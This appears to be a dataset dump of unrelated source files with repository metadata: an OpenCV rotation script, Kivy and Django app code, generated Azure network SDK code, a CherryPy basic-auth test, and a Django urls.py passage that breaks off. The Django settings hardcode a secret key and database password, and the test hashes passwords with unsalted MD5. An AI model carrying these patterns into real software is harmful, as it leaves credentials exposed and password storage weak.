|
import numpy as np
import cv2
img = cv2.imread(r'C:\Users\mueda\Documents\blog-thumb18.jpg')
height = img.shape[0]
width = img.shape[1]
center = (int(width/2), int(height/2))
angle = 90
scale = 1
trans = cv2.getRotationMatrix2D(center, angle , scale)
img2 = cv2.warpAffine(img, trans, (width,height))
cv2.imshow('image',img2)
cv2.waitKey()
|
[
"noreply@github.com"
] |
masaya-ueda.noreply@github.com
|
ee121fbd882866a933ea6f75a1ec2f90006ff419
|
b2973ee8f444e3abb0b62351007ede511ef45442
|
/screen_8.py
|
a8fddf2cde6dfc82e22ddd9b2b4fa5d77ab0bf3e
|
[] |
no_license
|
098anu/E-commerce-Kivy-App
|
2d664808be0389d4e4fca1eb9de4f34a70b3b96c
|
f38b5c7492fb9194e1ea6058801949635faf97cf
|
refs/heads/master
| 2020-04-26T17:13:22.744325
| 2019-03-04T08:46:46
| 2019-03-04T08:46:46
| 173,706,216
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 227
|
py
|
import kivy
from kivy.app import App
from kivy.uix.screenmanager import ScreenManager,Screen
class Screen8(Screen):
def chg_scr(self):
self.a = App.get_running_app()
self.a.root.current='screen_4'
|
[
"noreply@github.com"
] |
098anu.noreply@github.com
|
672214eecc6699295c10c3fce25663c3edf99bd8
|
0419ab96804792c2b10bd1f7a99cdba8484d18c3
|
/main/admin.py
|
10cabd00c1b2ade9a6b5d1219b1b036681205a51
|
[] |
no_license
|
bjorndonald/staff
|
84c71fe8a33f8391056872cac1600a2a18934580
|
116cd7b9b468924d984ded4a792c1da77f9336c7
|
refs/heads/master
| 2023-04-07T14:33:41.776989
| 2021-04-13T08:57:08
| 2021-04-13T08:57:08
| 342,188,467
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,095
|
py
|
from django.contrib import admin
from .models import *
from django.contrib.auth.models import User, Group
# if not Group.objects.filter(name="Hod"):
# hod = Group()
# hod.name = "HOD"
# hod.save()
# elif not Group.objects.filter(name="Staff"):
# staff = Group()
# staff.name = "Staff"
# staff.save()
# elif not Group.objects.filter(name="Receptionist"):
# receptionist = Group()
# receptionist.name = "Receptionist"
# receptionist.save()
# elif not Group.objects.filter(name="Admin"):
# admin = Group()
# admin.name = "Admin"
# admin.save()
# elif not Group.objects.filter(name="ChiefMedical"):
# chief = Group()
# chief.name = "ChiefMedical"
# chief.save()
# adminobj = User.objects.get(username="admin")
# if not adminobj.groups.all():
# admin_group = Group.objects.get(name='Admin')
# adminobj.groups.add(admin_group)
class StaffAdmin(admin.ModelAdmin):
list_display = ('staff_name','rank')
list_display_links =('staff_name',)
class State_Of_OriginAdmin(admin.ModelAdmin):
list_display = ('state_name',)
list_display_links =('state_name',)
class LGAAdmin(admin.ModelAdmin):
list_display = ('name',)
list_display_links =('name',)
class LocationAdmin(admin.ModelAdmin):
list_display = ('name',)
list_display_links =('name',)
class StepAdmin(admin.ModelAdmin):
list_display = ('step',)
list_display_links =('step',)
class Grade_LevelAdmin(admin.ModelAdmin):
list_display = ('grade_level_name',)
list_display_links =('grade_level_name',)
class RankAdmin(admin.ModelAdmin):
list_display = ('rank',)
list_display_links =('rank',)
class Geopolitical_ZoneAdmin(admin.ModelAdmin):
list_display = ('geopolitical_zone',)
list_display_links =('geopolitical_zone',)
# Register your models here.
admin.site.register(Staff,StaffAdmin)
admin.site.register(State_Of_Origin, State_Of_OriginAdmin)
admin.site.register(Step, StepAdmin)
admin.site.register(Grade_Level, Grade_LevelAdmin)
admin.site.register(Rank, RankAdmin)
admin.site.register(LGA, LGAAdmin)
admin.site.register(Location, LocationAdmin)
admin.site.register(Geopolitical_Zone, Geopolitical_ZoneAdmin)
|
[
"bjorndonaldb@yahoo.com"
] |
bjorndonaldb@yahoo.com
|
8bb48ad2868ae1c6e66f051695a91618adc63fe3
|
bcf04651f923182084934effc9ea0105b4a51dd1
|
/notes_app/notes_app/settings.py
|
29f7803fb00137c1d5d5ef641a288079b10b7feb
|
[] |
no_license
|
BilyanaRumenova/Python-Web-Basics
|
99b3e6e1dc8a8f766507b24730dee6ba9897602a
|
4439182a13dde3d0fb4d38eca4c5249515c25e77
|
refs/heads/main
| 2023-07-30T10:26:10.056985
| 2021-10-01T17:43:52
| 2021-10-01T17:43:52
| 384,038,931
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,663
|
py
|
"""
Django settings for notes_app project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from os.path import join
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-@_kg2g@^_up^k(ohil3ne1t(ks6x3&rd#u9f$v$@1vcuak-ayl'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'notes_app.note_app',
'notes_app.profile_app',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'notes_app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'templates']
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'notes_app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'notes_app_db',
'USER': 'postgres',
'PASSWORD': 'mypassword',
'HOST': '127.0.0.1',
'PORT': '5432',
}
}
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': BASE_DIR / 'db.sqlite3',
# }
# }
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
join(BASE_DIR, 'static'),
)
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
[
"bil.konstantinova@gmail.com"
] |
bil.konstantinova@gmail.com
|
a6ac867022374a7d5749606fe3f71e08c439b829
|
564d6a4d305a8ac6a7e01c761831fb2081c02d0f
|
/sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_11_01/aio/operations/_interface_endpoints_operations.py
|
77566c1a64c8b6fb8a612e5b37a03493495d778a
|
[
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] |
permissive
|
paultaiton/azure-sdk-for-python
|
69af4d889bac8012b38f5b7e8108707be679b472
|
d435a1a25fd6097454b7fdfbbdefd53e05029160
|
refs/heads/master
| 2023-01-30T16:15:10.647335
| 2020-11-14T01:09:50
| 2020-11-14T01:09:50
| 283,343,691
| 0
| 0
|
MIT
| 2020-07-28T22:43:43
| 2020-07-28T22:43:43
| null |
UTF-8
|
Python
| false
| false
| 22,801
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class InterfaceEndpointsOperations:
"""InterfaceEndpointsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_11_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
interface_endpoint_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-11-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
interface_endpoint_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Deletes the specified interface endpoint.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
interface_endpoint_name=interface_endpoint_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
async def get(
self,
resource_group_name: str,
interface_endpoint_name: str,
expand: Optional[str] = None,
**kwargs
) -> "models.InterfaceEndpoint":
"""Gets the specified interface endpoint by resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: InterfaceEndpoint, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_11_01.models.InterfaceEndpoint
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpoint"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-11-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
interface_endpoint_name: str,
parameters: "models.InterfaceEndpoint",
**kwargs
) -> "models.InterfaceEndpoint":
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpoint"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-11-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'InterfaceEndpoint')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
interface_endpoint_name: str,
parameters: "models.InterfaceEndpoint",
**kwargs
) -> AsyncLROPoller["models.InterfaceEndpoint"]:
"""Creates or updates an interface endpoint in the specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:param parameters: Parameters supplied to the create or update interface endpoint operation.
:type parameters: ~azure.mgmt.network.v2018_11_01.models.InterfaceEndpoint
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either InterfaceEndpoint or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2018_11_01.models.InterfaceEndpoint]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpoint"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
interface_endpoint_name=interface_endpoint_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
def list(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["models.InterfaceEndpointListResult"]:
"""Gets all interface endpoints in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either InterfaceEndpointListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2018_11_01.models.InterfaceEndpointListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpointListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-11-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('InterfaceEndpointListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints'} # type: ignore
def list_by_subscription(
self,
**kwargs
) -> AsyncIterable["models.InterfaceEndpointListResult"]:
"""Gets all interface endpoints in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either InterfaceEndpointListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2018_11_01.models.InterfaceEndpointListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.InterfaceEndpointListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-11-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_subscription.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('InterfaceEndpointListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/interfaceEndpoints'} # type: ignore
|
[
"noreply@github.com"
] |
paultaiton.noreply@github.com
|
feaedb644bd6aafe5e8f22d83f249aa852909466
|
5864e86954a221d52d4fa83a607c71bacf201c5a
|
/carbon/common/lib/cherrypy/test/test_auth_basic.py
|
bdf0d7e1d1c0cd2d6f050c93047528626ed88b7e
|
[] |
no_license
|
connoryang/1v1dec
|
e9a2303a01e5a26bf14159112b112be81a6560fd
|
404f2cebf13b311e754d45206008918881496370
|
refs/heads/master
| 2021-05-04T02:34:59.627529
| 2016-10-19T08:56:26
| 2016-10-19T08:56:26
| 71,334,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,806
|
py
|
#Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\carbon\common\lib\cherrypy\test\test_auth_basic.py
import cherrypy
from cherrypy._cpcompat import md5, ntob
from cherrypy.lib import auth_basic
from cherrypy.test import helper
class BasicAuthTest(helper.CPWebCase):
def setup_server():
class Root:
def index(self):
return 'This is public.'
index.exposed = True
class BasicProtected:
def index(self):
return "Hello %s, you've been authorized." % cherrypy.request.login
index.exposed = True
class BasicProtected2:
def index(self):
return "Hello %s, you've been authorized." % cherrypy.request.login
index.exposed = True
userpassdict = {'xuser': 'xpassword'}
userhashdict = {'xuser': md5(ntob('xpassword')).hexdigest()}
def checkpasshash(realm, user, password):
p = userhashdict.get(user)
return p and p == md5(ntob(password)).hexdigest() or False
conf = {'/basic': {'tools.auth_basic.on': True,
'tools.auth_basic.realm': 'wonderland',
'tools.auth_basic.checkpassword': auth_basic.checkpassword_dict(userpassdict)},
'/basic2': {'tools.auth_basic.on': True,
'tools.auth_basic.realm': 'wonderland',
'tools.auth_basic.checkpassword': checkpasshash}}
root = Root()
root.basic = BasicProtected()
root.basic2 = BasicProtected2()
cherrypy.tree.mount(root, config=conf)
setup_server = staticmethod(setup_server)
def testPublic(self):
self.getPage('/')
self.assertStatus('200 OK')
self.assertHeader('Content-Type', 'text/html;charset=utf-8')
self.assertBody('This is public.')
def testBasic(self):
self.getPage('/basic/')
self.assertStatus(401)
self.assertHeader('WWW-Authenticate', 'Basic realm="wonderland"')
self.getPage('/basic/', [('Authorization', 'Basic eHVzZXI6eHBhc3N3b3JX')])
self.assertStatus(401)
self.getPage('/basic/', [('Authorization', 'Basic eHVzZXI6eHBhc3N3b3Jk')])
self.assertStatus('200 OK')
self.assertBody("Hello xuser, you've been authorized.")
def testBasic2(self):
self.getPage('/basic2/')
self.assertStatus(401)
self.assertHeader('WWW-Authenticate', 'Basic realm="wonderland"')
self.getPage('/basic2/', [('Authorization', 'Basic eHVzZXI6eHBhc3N3b3JX')])
self.assertStatus(401)
self.getPage('/basic2/', [('Authorization', 'Basic eHVzZXI6eHBhc3N3b3Jk')])
self.assertStatus('200 OK')
self.assertBody("Hello xuser, you've been authorized.")
|
[
"le02005@163.com"
] |
le02005@163.com
|
f6744796ed340e7e048f4d8220c81eef3d8372a7
|
abcbaa89dcfb2ca1dd611a7bdac0b3e2b128fa19
|
/btre_project/urls.py
|
70e4808b547064a9c216ca94385e6f650fa64078
|
[] |
no_license
|
gaylonalfano/DjangoBTRealEstate
|
95994fd24fcbc011ee587f050b65ff738f7e92f4
|
e98d31530de1b634aedca3682e8bdc46ea118811
|
refs/heads/master
| 2020-04-01T22:53:02.835080
| 2018-11-19T08:28:04
| 2018-11-19T08:28:04
| 153,731,449
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,802
|
py
|
"""btre_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
"""
* **PROCESS OVERVIEW**: For this example we’re going to add an about page to our blog app: blog > urls.py > urlpatterns: path(‘about/', views.about, name=‘blog-about’). **NOTE: This is a little different than the process overview above since the one above is add adding a route to the main project! For this example, we’re only adding a new route/path within the blog app. This is a key difference and aligns with the Django framework and adding multiple apps within the site (i.e., a blog app in this case). It wants to keep the blog-specific (app-specific) functionality to be separate from the project-level functionality. So, if a user requests a page that’s within the blog app, the project will redirect the request to the blog app urls.py to be further handled.
* If a user/visitor to our site goes to the blog/about page, the request will now reference/be sent over to our blog.urls
* When Django encounters include(), it chops off the included portion of the url (“blog/") and only sends the remaining string (“about/" in this case) to the included blog.urls module to get processed. Since “about/" is remaining, it just sends the string “about/" over to blog.urls.
* Once it’s passed over to blog.urls, Django then starts searching for a matching “about/” string. Essentially Django is asking, "Do I have a pattern in here that matches “about/”?" Turns out yes we do: urlpatterns: path(‘about/', views.about, name=‘blog-about’)
* Based on the urlpattern, the “about/” route will be handled by the function views.about (defined in blog views.py): def about(request): return HttpResponse(‘<h1>Blog About</h1>’).
* So then we can navigate to our views.py file and then find the home function. Now it/the request comes to this home function and executes (the home function takes request as an argument).
* In this example, the home function essentially runs/says, "Ok, so now we just want to return an HttpResponse with an <h1> that says "Blog Home"." That's the whole process basically.
* **IMPORTANT**: Why it’s good that the URL gets passed around like this: If we wanted to change the route to our blog application (or any app we build for that matter), then we can change the URL in one place and it applies to all of those routes! For example, say we are building a blog that’s in development and we want to do some live testing on our website but weren’t ready to make it fully live just yet. We could simply go to our project urls.py urlpatterns and change the path from ‘blog/‘ to ‘blog_dev/‘ - it’s that easy! With that one change, in order to go to my blog that I’m developing and testing on my site, I just have to enter …/blog_dev/ and all the links/urls within the blog application will still be accessible through this blog_dev/ route now! Didn’t have to change anything in our blog application. Only had to change the one project path in the urls.py urlpatterns!
"""
from django.contrib import admin
# Need to import include() from django.urls so you can link the path to the
# urls.py file inside the pages app:
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
# if you want to go straight to home page then use ''
